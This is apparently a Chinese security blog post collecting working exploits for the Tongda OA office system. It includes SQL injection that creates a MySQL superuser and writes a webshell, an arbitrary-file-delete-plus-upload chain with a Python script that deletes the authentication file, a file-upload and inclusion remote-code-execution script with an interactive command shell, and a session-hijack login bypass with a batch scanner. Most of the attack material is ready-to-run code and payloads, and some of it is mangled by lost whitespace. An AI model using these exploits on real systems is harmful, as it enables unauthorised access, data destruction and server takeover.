通达OA漏洞整理
本文最后更新于147天前,其中的信息可能已经有所发展或是发生改变。
通达OAOffice Anywhere网络智能办公系统),该系统采用领先的B/S(浏览器/服务器)操作方式,使得网络办公不受地域限。 

Office Anywhere采用基于WEB的企业计算,主HTTP服务器采用了世界上最先进的Apache服务器,性能稳定可靠。数据存取集中控制,避免了数据泄漏的可能。提供数据备份工具,保护系统数据安全。多级的权限控制,完善的密码验证与登录验证机制更加强了系统安全性。

V11.7后台SQL注入漏洞
0x01:
漏洞影响:通达oaV11.7
利用条件:需账户登陆
 

0x02:

漏洞复现:
漏洞路径
/general/appbuilder/web/officeproduct/productapply/applyprobygroup/general/hr/manage/query/delete_cascade.php?condition_cascade=*

复现过程:

登陆后访问URL:
http://192.168.2.139/general/hr/manage/query/delete_cascade.php?condition_cascade=select%20if((substr(user(),1,1)=%27r%27),1,power(9999,99))

其中过滤了sleep,updatexml等函数,这里可以通过其他函数去绕过

利用注入向数据库中添加新用户:

grant allprivileges ON mysql.* TO 'at666'@'%' IDENTIFIED BY 'abcABC@123' WITH GRANTOPTION

使用添加的账户链接数据库

添加的账户不能直接通过日志慢查询写入文件,需要给创建的账户添加权限
UPDATE `mysql`.`user`SET `Password` = '*DE0742FA79F6754E99FDB9C8D2911226A5A9051D', `Select_priv` ='Y', `Insert_priv` = 'Y', `Update_priv` = 'Y', `Delete_priv` = 'Y',`Create_priv` = 'Y', `Drop_priv` = 'Y', `Reload_priv` = 'Y', `Shutdown_priv` ='Y', `Process_priv` = 'Y', `File_priv` = 'Y', `Grant_priv` = 'Y',`References_priv` = 'Y', `Index_priv` = 'Y', `Alter_priv` = 'Y', `Show_db_priv`= 'Y', `Super_priv` = 'Y', `Create_tmp_table_priv` = 'Y', `Lock_tables_priv` ='Y', `Execute_priv` = 'Y', `Repl_slave_priv` = 'Y', `Repl_client_priv` = 'Y',`Create_view_priv` = 'Y', `Show_view_priv` = 'Y', `Create_routine_priv` = 'Y',`Alter_routine_priv` = 'Y', `Create_user_priv` = 'Y', `Event_priv` = 'Y',`Trigger_priv` = 'Y', `Create_tablespace_priv` = 'Y', `ssl_type` = '',`ssl_cipher` = '', `x509_issuer` = '', `x509_subject` = '', `max_questions` = 0,`max_updates` = 0, `max_connections` = 0, `max_user_connections` = 0, `plugin`= 'mysql_native_password', `authentication_string` = '', `password_expired` ='Y' WHERE `Host` = Cast('%' AS Binary(1)) AND `User` = Cast('at666' ASBinary(5));

由于当前用户无刷新权限,这里用注入点进行刷新权限
http://IP/general/hr/manage/query/delete_cascade.php?condition_cascade=flushprivileges;

再次登陆的时候,会提示密码过期,使用注入点重新执行语句

grant all privileges ONmysql.* TO 'at666'@'%' IDENTIFIED BY 'abcABC@123' WITH GRANT OPTION

利用慢查询日志写入shell

select @@basedir;//查看绝对路径set global slow_query_log=on;set global slow_query_log_file='C:/MYOA/webroot/shell.php';select '' or sleep(11);

任意文件删除&文件上传GETSHELL漏洞

0x01

      影响版本:

通达OA V11.6

0x02

      漏洞复现:

通过任意文件漏洞删除上传点包含的身份验证文件,从而造成未授权访问实现任意文件上传
上传点:
http:///general/data_center/utils/upload.php
由于存在验证,直接访问会提示登陆

这里可以配合任意文件删除漏洞删除验证的配置文件,从而上传文件。

漏洞触发点在module/appbuilder/assets/print.php

$s_tmp = __DIR__ . "/../../../../logs/appbuilder/logs";$s_tmp .= "/" . $_GET["guid"]; if (file_exists($s_tmp)) {    $arr_data = unserialize(file_get_contents($s_tmp));    unlink($s_tmp);    $s_user = $arr_data["user"];}else {    echo "未知参数";    exit();}

传入参数guid通过../进行目录穿越实现任意文件删除

payload:?guid=../../../webroot/inc/auth.inc.php

利用任意文件删除 

module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php

 将验证文件删除(实战环境慎用)

再次访问上传文件点

构造POC
formaction="http://IP/general/data_center/utils/upload.php"method="post" enctype="multipart/form-data">input type="text"name='filetype'value ='ghtwf01'>input>inputtype="text"name='action' value ='upload'>input>inputtype="text"name='repkid' value ='../../../'>input>inputtype="file" name="FILE1">input>inputtype="submit" >input>body>form>

连接webshell

0x03 

相关利用脚本

import requeststarget="http://IP/"payload=""print("[*]Warning,Thisexploit code will DELETE auth.inc.php which may damage the OA")input("Press enter tocontinue")print("[*]Deleting auth.inc.php....") url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"requests.get(url=url)print("[*]Checking iffile deleted...")url=target+"/inc/auth.inc.php"page=requests.get(url=url).textif 'No input file specified.'not in page:    print("[-]Failed to deletedauth.inc.php")    exit(-1)print("[+]Successfullydeleted auth.inc.php!")print("[*]Uploadingpayload...")url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/../../../"files = {'FILE1':('hack.php', payload)}requests.post(url=url,files=files)url=target+"/_hack.php"page=requests.get(url=url).textif 'No input filespecified.' not in page:    print("[+]Filed UploadedSuccessfully")    print("[+]URL:",url)else:   print("[-]Failed to upload file")
文件包含&文件上传Getshell

0x01

影响版本:

通达OA V11

通达OA 2017

通达OA 2016

通达OA 2015

通达OA 2013

0x02

漏洞复现:

上传漏洞触发点:

http:///ispirit/im/upload.php

直接访问显示没有登陆

根据代码逻辑,可以通过P参数进行绕过

POST发送参数P

由于代码存在黑名单,首先上传图片马,在使用文件包含进行绕过

构造表单文件进行上传

html>  body>    formaction="http://IP/ispirit/im/upload.php" method="post"  enctype="multipart/form-data">      input  type="text"name='P' value = 1  >input>      input  type="text"name='MSG_CATE' value = 'file'>input>      input  type="text"name='UPLOAD_MODE' value= 1 >input>      inputtype="text" name="DEST_UID" value = 1>input>      inputtype="file" name="ATTACHMENT">input>      inputtype="submit" >input>  body>html>

利用文件包含漏洞,包含上传的图片木🐎

http:///ispirit/interface/gateway.php
POST:json={"url":"general/../../attach/im/2105/300974014.1.jpg"}

可以看到可以执行

0x03

相关利用脚本:
#!/usr/bin/env python3# -*- encoding: utf-8 -*-# oa通达文件上传加文件包含远程代码执行
import requestsimport reimport sys
def oa(url):    upurl = url + '/ispirit/im/upload.php'    headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/62.0.3202.9 Safari/537.36", "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3","Accept-Encoding": "gzip, deflate", "Connection":"close", "Upgrade-Insecure-Requests": "1","Content-Type": "multipart/form-data;boundary=---------------------------27723940316706158781839860668"}    data ="-----------------------------27723940316706158781839860668rnContent-Disposition:form-data; name="ATTACHMENT";filename="jpg"rnContent-Type: image/jpegrnrn$command=$_POST['cmd'];rn$wsh= new COM('WScript.shell');rn$exec = $wsh->exec("cmd /c".$command);rn$stdout = $exec->StdOut();rn$stroutput =$stdout->ReadAll();rnecho$stroutput;rn?>nrn-----------------------------27723940316706158781839860668rnContent-Disposition:form-data; name="P"rnrn1rn-----------------------------27723940316706158781839860668rnContent-Disposition:form-data;name="DEST_UID"rnrn1222222rn-----------------------------27723940316706158781839860668rnContent-Disposition:form-data; name="UPLOAD_MODE"rnrn1rn-----------------------------27723940316706158781839860668--rn"    req = requests.post(url=upurl,headers=headers, data=data)    filename ="".join(re.findall("2003_(.+?)|",req.text))    in_url = url +'/ispirit/interface/gateway.php'    headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/62.0.3202.9 Safari/537.36", "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3","Accept-Encoding": "gzip, deflate","X-Forwarded-For": "127.0.0.1", "Connection":"close", "Upgrade-Insecure-Requests": "1","Content-Type": "application/x-www-form-urlencoded"}    data ="json={"url":"../../../general/../attach/im/2003/%s.jpg"}&cmd=%s"% (filename,"echo php00py")    include_req = requests.post(url=in_url,headers=headers, data=data)    if 'php00py' in include_req.text:        print("[+] OA RCE vulnerability")        return filename    else:        print("[-] Not OA RCEvulnerability ")        return False

def oa_rce(url,filename,command):    url = url +'/ispirit/interface/gateway.php'    headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/62.0.3202.9 Safari/537.36", "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3","Accept-Encoding": "gzip, deflate", "Connection":"close", "Upgrade-Insecure-Requests": "1","Content-Type": "application/x-www-form-urlencoded"}    data ="json={"url":"../../../general/../attach/im/2003/%s.jpg"}&cmd=%s"% (filename,command)    req = requests.post(url, headers=headers,data=data)    print(req.text)


if __name__ == '__main__':        if len(sys.argv) 2:            print("please input your urlpython oa_rce.py http://127.0.0.1:8181")        else:            url = sys.argv[1]            filename = oa(url)            while filename:                try:                    command =input("wran@shelLhost#")
                    if command =="exit" or command == "quit":                        break                    else:                       oa_rce(url,filename,command)                except KeyboardInterrupt:                   break

通达OA版本

0x01

影响版本:

通达OA

通达OA 2017

0x02

漏洞复现:

复现环境:通达OA V11.3

访问 

http:///logincheck_code.php

 获取session

获取并记录code_uid参数

POST传递CODEUID和被伪造用户的UID到
/logincheck_code.php

直接访问URL既可以登陆后台界面:
http://192.168.2.143/general/index.php

0x03

利用脚本:

import requestsimport sysimport randomimport reimport timeimport threadingfromrequests.packages.urllib3.exceptions import InsecureRequestWarning
def title():   print('+------------------------------------------')    print('+ 33[34mVersion: 通达OA 11.7            ')    print('+ 33[34mVersion: 用法:python3 poc.pyhttp://xxx.xxx.xxx.xxx/            ')    print('+------------------------------------------')
def POC_1(target_url):    vuln_url = target_url +"/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0"    headers = {        "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/86.0.4240.111 Safari/537.36",    }    try:       requests.packages.urllib3.disable_warnings(InsecureRequestWarning)        response = requests.get(url=vuln_url,headers=headers, verify=False, timeout=5)        if "RELOGIN" in response.textand response.status_code == 200:           print(target_url.replace("n","") +"33[31m[x]目标用户为下线状态 ---{}33[0m".format(time.asctime( time.localtime(time.time()))))        elif response.status_code == 200 andresponse.text == "":            PHPSESSION =re.findall(r'PHPSESSID=(.*?);', str(response.headers))           print(target_url.replace("n","") +"33[32m[o] 用户上线 PHPSESSION: {} ---{}33[0m".format(PHPSESSION[0],time.asctime(time.localtime(time.time()))))        else:            print("33[31m[x] 请求失败,目标可能不存在漏洞")            sys.exit(0)    except Exception as e:        print("33[31m[x] 请求失败 33[0m", e)
if __name__ == '__main__':    title()    # target_url =str(input("33[35mPlease input Attack UrlnUrl >>> 33[0m"))    # while True:    #    POC_1(target_url)    #    time.sleep(5)
    # 批量检测    for url in open("url.txt"):        # POC_1(url)        t1 = threading.Thread(target=POC_1,args=(url.replace("n", ""),))       t1.start()

当存在用户登陆时,可获取该用户的SESSION值,替换session值即可登陆系统

点击数:37

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇